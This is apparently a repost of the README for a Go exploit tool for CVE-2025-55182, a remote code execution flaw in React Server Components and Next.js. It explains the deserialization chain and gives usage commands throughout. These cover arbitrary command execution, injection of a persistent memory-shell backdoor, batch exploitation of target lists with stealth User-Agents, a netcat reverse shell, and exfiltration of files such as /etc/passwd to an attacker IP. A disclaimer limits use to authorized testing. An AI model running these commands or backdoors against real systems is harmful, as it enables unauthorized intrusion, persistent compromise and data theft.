Share
## https://sploitus.com/exploit?id=A34DB9D5-3E4B-5958-95FE-62008E8CB6E9
# CVE-2025-55182 React Server Components RCE - Go PoC
β οΈ **FOR AUTHORIZED SECURITY TESTING ONLY** β οΈ
## Description
CVE-2025-55182 (also known as CVE-2025-66478) is a critical Remote Code Execution vulnerability in React Server Components (Flight protocol). This tool is a Go implementation of the PoC for security research and authorized penetration testing.
**Affected versions:**
- react-server-dom-webpack: 19.0.0 - 19.2.0
- Next.js: 15.x (before patches: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7)
- Next.js: 16.x (before 16.0.7)
- Next.js: 14.3.0-canary.77 and later canary versions
## Vulnerability Details
The exploit leverages prototype pollution in Flight protocol deserialization:
1. Uses `$@` deserialization to get a Chunk reference
2. Places `Chunk.prototype.then` as the `then` property of root object
3. Sets status to `RESOLVED_MODEL` to call `initializeModelChunk` with a controlled fake chunk
4. Triggers Blob deserialization which calls `response._formData.get` with attacker payload
5. Sets `response._formData.get` to Function constructor for arbitrary code execution
## Features
- **Full RCE capability** - Execute arbitrary commands with output
- **Vulnerability check mode** - Safe detection without exploitation
- **Next.js version detection** - Automatic version fingerprinting
- **Memory Shell injection** - Persistent backdoor at `/exec?cmd=`
- **Batch scanning** - Multi-threaded scanning with JSON output
- **Comprehensive proxy support:**
- SOCKS5 with/without authentication
- SOCKS4/SOCKS4a
- HTTP/HTTPS proxy with/without authentication
- **Stealth mode** - Browser, crawler, security User-Agents
- **Rate limiting** - Configurable delays between requests
- **Reverse shell** - mkfifo + nc (works on Alpine/busybox)
- **Data exfiltration** - POST command output to attacker server
- **Cross-platform builds** - 30+ OS/architecture combinations
- **JSON output** - Machine-readable results for automation
## Installation
### Pre-built Binaries
Download the latest release for your platform from [GitHub Releases](https://github.com/keklick1337/CVE-2025-55182-golang-PoC/releases/latest).
Available binaries:
- **Linux:** amd64, 386, arm, arm64, mips, mipsle, mips64, riscv64, ppc64, s390x
- **Windows:** amd64, 386, arm64
- **macOS:** amd64 (Intel), arm64 (Apple Silicon)
- **FreeBSD, OpenBSD, NetBSD:** amd64, 386, arm, arm64
- **And more...**
### From Source
```bash
# Clone repository
git clone https://github.com/keklick1337/CVE-2025-55182-golang-PoC.git
cd CVE-2025-55182-golang-PoC
# Build for current platform
go build -o cve-2025-55182 .
# Or build for all platforms
chmod +x build.sh
./build.sh
```
### Build from Source
After running `./build.sh`, binaries will be available in the `build/` directory for all supported platforms.
## Usage
### Basic Commands
```bash
# Check single target for vulnerability
./cve-2025-55182 -u http://target:3000 --check
# Detect Next.js version
./cve-2025-55182 -u http://target:3000 --version-check
# Execute command with output
./cve-2025-55182 -u http://target:3000 -c "id"
./cve-2025-55182 -u http://target:3000 -c "cat /etc/passwd"
```
### Memory Shell (Persistent Backdoor)
```bash
# Inject memory shell (checks if already installed first)
./cve-2025-55182 -u http://target:3000 --memshell
# Test if memory shell is active
./cve-2025-55182 -u http://target:3000 --test-shell
# Execute command via memory shell
./cve-2025-55182 -u http://target:3000 --shell-exec "cat /etc/passwd"
# After injection, you can also use curl directly:
curl 'http://target:3000/exec?cmd=id'
curl 'http://target:3000/exec?cmd=whoami'
```
### Proxy Support
```bash
# SOCKS5 with authentication
./cve-2025-55182 -u http://target:3000 --check --proxy socks5://user:pass@127.0.0.1:1080
# SOCKS5 without authentication
./cve-2025-55182 -u http://target:3000 --check --proxy socks5://127.0.0.1:1080
# SOCKS4 proxy
./cve-2025-55182 -u http://target:3000 --check --proxy socks4://127.0.0.1:1080
# HTTP proxy
./cve-2025-55182 -u http://target:3000 --check --proxy http://127.0.0.1:8080
```
### Batch Scanning
```bash
# Batch check from file
./cve-2025-55182 --urls targets.txt --check
# Batch scan with JSON output
./cve-2025-55182 --urls targets.txt --check --json -o results.json
# Batch scan with multiple threads and stealth
./cve-2025-55182 -f targets.txt --check --threads 20 --stealth crawler --delay 2s
# Save vulnerable targets to file
./cve-2025-55182 -f targets.txt --check -o vulnerable.txt
# Batch memory shell injection
./cve-2025-55182 --urls targets.txt --memshell --workers 10
# Batch command execution
./cve-2025-55182 --urls targets.txt -c "id" --threads 5
```
### Network Exfiltration
```bash
# Reverse shell (mkfifo + nc, works on Alpine)
./cve-2025-55182 -u http://target:3000 --revshell 10.0.0.1 4444
# Start listener on attacker machine first:
nc -lvnp 4444
# Exfiltrate command output via HTTP POST
./cve-2025-55182 -u http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444
# Start listener: nc -lvnp 4444
```
## Options
| Option | Description |
|--------|-------------|
| `-u, --url` | Target URL (e.g., http://localhost:3000) |
| `-f, --file` | File containing target URLs (one per line) |
| `--urls` | Alias for -f/--file |
| `-o, --output` | Output file for vulnerable targets |
| `--json` | Output results in JSON format |
| `-c, --command` | Command to execute (with output) |
| `--check` | Check for vulnerability |
| `--version-check` | Detect Next.js version |
| `--proxy` | Proxy URL (socks5://user:pass@ip:port, socks4://ip:port, http://ip:port) |
| `--stealth` | Stealth mode: browser, crawler, security (default: browser) |
| `--delay` | Delay between requests (e.g., 2s, 500ms) |
| `--variants` | Use multiple payload variants for thorough check |
| `--memshell` | Inject memory shell (persistent backdoor) |
| `--test-shell` | Test if memory shell is active |
| `--shell-exec` | Execute command via memory shell |
| `--revshell IP PORT` | Establish reverse shell |
| `--exfil CMD IP PORT` | Execute command and POST output |
| `-t, --timeout` | Request timeout in seconds (default: 15) |
| `--threads` | Number of concurrent threads (default: 10) |
| `--workers` | Alias for --threads |
| `--nocolor` | Disable colored output (for Windows/pipes) |
| `-h, --help` | Show help message |
| `-v, --version` | Show version |
## Proxy Types
```
socks5://user:pass@ip:port - SOCKS5 with authentication
socks5://ip:port - SOCKS5 without authentication
socks5h://ip:port - SOCKS5 with remote DNS resolution
socks4://ip:port - SOCKS4 proxy
socks4a://ip:port - SOCKS4a proxy
http://user:pass@ip:port - HTTP proxy with authentication
http://ip:port - HTTP proxy without authentication
https://ip:port - HTTPS proxy
```
## Stealth Modes
| Mode | Description |
|------|-------------|
| `browser` | Mimics real browser requests (Chrome, Firefox, Safari, Edge) - default |
| `crawler` | Mimics search engine crawlers (Googlebot, Bingbot, Baiduspider, etc.) |
| `security` | Uses security scanner User-Agents (Nessus, Nuclei) |
## Memory Shell
The memory shell feature injects a persistent backdoor that:
1. **Checks first** - Before injection, verifies if shell is already installed
2. **Hooks http.Server.prototype.emit** - Intercepts all HTTP requests
3. **Creates /exec endpoint** - Accepts `cmd` query parameter
4. **Survives until restart** - Persists in server memory
```bash
# After injection:
curl 'http://target:3000/exec?cmd=id'
curl 'http://target:3000/exec?cmd=ls+-la'
curl 'http://target:3000/exec?cmd=cat+/etc/passwd'
```
## Project Structure
```
.
βββ main.go # CLI entry point
βββ pkg/
β βββ colors/
β β βββ colors.go # Terminal colors with --nocolor support
β βββ exploit/
β β βββ exploit.go # Core exploit logic, memory shell, version detection
β βββ proxy/
β β βββ proxy.go # SOCKS4/5, HTTP proxy support
β βββ scanner/
β β βββ scanner.go # Batch scanning with JSON output
β βββ stealth/
β βββ stealth.go # User-Agent randomization
βββ build.sh # Cross-platform build script
βββ go.mod # Go module file
βββ go.sum # Go dependencies
βββ README.md # This file
```
## Cross-Platform Builds
The `build.sh` script builds for 30+ platforms:
- **Linux:** amd64, 386, arm, arm64, mips, mipsle, mips64, riscv64, ppc64, s390x
- **Windows:** amd64, 386, arm64 (.exe)
- **macOS:** amd64 (Intel), arm64 (Apple Silicon)
- **FreeBSD:** amd64, 386, arm, arm64
- **OpenBSD:** amd64, 386, arm, arm64
- **NetBSD:** amd64, 386, arm, arm64
- **DragonFly BSD:** amd64
- **Solaris/Illumos:** amd64
- **Plan 9:** amd64, 386
- **AIX:** ppc64
```bash
chmod +x build.sh
./build.sh
```
## JSON Output Format
When using `--json` flag, results are saved in JSONL format (one JSON per line):
```json
{"url":"http://target:3000","vulnerable":true,"version":"15.0.3","checked_at":"2025-12-06T12:00:00Z","response_time_ms":1234}
```
Full report (`_report.json`) includes:
```json
{
"scan_time": "2025-12-06T12:00:00Z",
"total_urls": 100,
"vulnerable_count": 5,
"safe_count": 90,
"timeout_count": 5,
"results": [...]
}
```
## Version Detection
The tool can detect Next.js version from:
- `X-Powered-By` header
- HTML/JS source (`__NEXT_DATA__`, `/_next/` paths)
- Build manifest patterns
Vulnerable versions are highlighted in red.
## Disclaimer
β οΈ **IMPORTANT LEGAL NOTICE** β οΈ
This tool is provided **strictly for educational purposes and authorized security testing only**.
### Intended Use
- Security research and vulnerability assessment
- Authorized penetration testing with written permission
- Testing your own applications and infrastructure
- Educational demonstration in controlled lab environments
- Developing patches and security mitigations
### Prohibited Use
**It is strictly prohibited to use this tool:**
- Against systems you do not own or have explicit written authorization to test
- For any malicious, illegal, or unauthorized activities
- To gain unauthorized access to computer systems or networks
- In violation of any applicable local, state, national, or international laws
- To disrupt, damage, or compromise systems without authorization
### Legal Warning
**Unauthorized access to computer systems is a criminal offense** in most jurisdictions worldwide, including but not limited to:
- πΊπΈ USA: Computer Fraud and Abuse Act (CFAA) - up to 20 years imprisonment
- πͺπΊ EU: Directive 2013/40/EU on attacks against information systems
- π·πΊ Russia: Article 272-274 of the Criminal Code
- π¬π§ UK: Computer Misuse Act 1990
- π©πͺ Germany: Β§202a-202d StGB
- π¨π³ China: Criminal Law Articles 285-287
### No Warranty
THIS SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED. THE AUTHORS AND COPYRIGHT HOLDERS SHALL NOT BE LIABLE FOR ANY CLAIM, DAMAGES, OR OTHER LIABILITY ARISING FROM THE USE OF THIS SOFTWARE.
### User Responsibility
By downloading, installing, or using this tool, you acknowledge that:
1. You are solely responsible for your actions
2. You will only use this tool on systems you own or have explicit authorization to test
3. You understand and accept all risks associated with using this software
4. The author bears no responsibility for any misuse or damage caused
**If you do not agree with these terms, do not use this tool.**
## Author
**Vladislav Tislenko aka keklick1337**
Date: 2025-12-05
## License
This project is licensed under the **MIT License** - see the [LICENSE](LICENSE) file for details.
---
**Use responsibly. Stay legal. π**